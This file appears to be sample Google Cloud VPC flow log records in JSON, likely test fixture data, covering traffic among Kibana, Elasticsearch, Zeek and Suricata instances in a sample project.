+{"insertId":"bxuq05fhgmw9i","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60640},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw9c","jsonPayload":{"bytes_sent":"45","connection":{"dest_ip":"67.43.156.14","dest_port":41818,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:43:16.809366809Z","packets_sent":"9","reporter":"SRC","rtt_msec":"1350","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:11.031370298Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9h","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60640,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:42:50.942543211Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:42:50.830164366Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw92","jsonPayload":{"bytes_sent":"358920","connection":{"dest_ip":"10.87.40.76","dest_port":33966,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"61","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"t
ype":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} +{"insertId":"bxuq05fhgmw8u","jsonPayload":{"bytes_sent":"653827","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53104},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"286","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9g","jsonPayload":{"bytes_sent":"5220","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"81","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510534141Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw91","jsonPayload":{"bytes_sent":"31140","connection":{"dest_ip":"10.87.40.76","dest_port":33524,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.461240929Z","packets_sent":"40","reporter":"DEST","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:24.789945697Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw95","jsonPayload":{"bytes_sent":"1610630","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.101129310Z","packets_sent":"509","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.019841536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"bxuq05fhgmw9a","jsonPayload":{"bytes_sent":"37145","connection":{"dest_ip":"67.43.156.14","dest_port":53104,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:45.312543839Z","packets_sent":"158","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.188944581Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:16.593800036Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:16.593800036Z"} 
+{"insertId":"198begsfh44xy3","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53972},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} +{"insertId":"198begsfh44xxt","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":58100},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:20.632737426Z","packets_sent":"7","reporter":"DEST","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:49:20.512264850Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xy8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":58100,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:49:20.632777660Z","packets_sent":"7","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:49:20.512407536Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy9","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.14","dest_port":60756,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxr","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":14236},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:12.064908439Z","packets_sent":"3","reporter":"DEST","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy2","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":60122,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy6","jsonPayload":{"bytes_sent":"1782","connection":{"dest_ip":"67.43.156.13","dest_port":53972,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:20.748121914Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:20.634231041Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxx","jsonPayload":{"bytes_sent":"68545","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33530},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205089801Z","packets_sent":"368","reporter":"DEST","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
k_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy4","jsonPayload":{"bytes_sent":"74613","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65274},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"745","reporter":"DEST","rtt_msec":"209","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy1","jsonPayload":{"bytes_sent":"74942","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":53879},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"726","reporter":"DEST","rtt_msec":"176","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxp","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34450},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxv","jsonPayload":{"bytes_sent":"121593","connection":{"dest_ip":"67.43.156.13","dest_port":65274,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220838853Z","packets_sent":"610","reporter":"SRC","rtt_msec":"209","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.270996793Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy7","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxs","jsonPayload":{"bytes_sent":"177471","connection":{"dest_ip":"67.43.156.13","dest_port":33530,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:52.205194199Z","packets_sent":"246","reporter":"SRC","rtt_msec":"163","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140301693Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"} 
+{"insertId":"198begsfh44xxq","jsonPayload":{"bytes_sent":"53315","connection":{"dest_ip":"67.43.156.13","dest_port":65275,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"588","reporter":"SRC","rtt_msec":"82","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxz","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34450,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:38.299054333Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:38.189569840Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxy","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":60122},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:39.207635184Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:39.087226326Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxu","jsonPayload":{"bytes_sent":"102119","connection":{"dest_ip":"67.43.156.13","dest_port":53879,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.312105537Z","packets_sent":"608","reporter":"SRC","rtt_msec":"176","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760414869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxo","jsonPayload":{"bytes_sent":"1794","connection":{"dest_ip":"67.43.156.13","dest_port":60968,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:39.777977145Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:39.653136947Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xy0","jsonPayload":{"bytes_sent":"1467","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":60756},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:11.032929292Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:10.912193869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"198begsfh44xxw","jsonPayload":{"bytes_sent":"67013","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65275},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.316847800Z","packets_sent":"710","reporter":"DEST","rtt_msec":"82","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.565734921Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
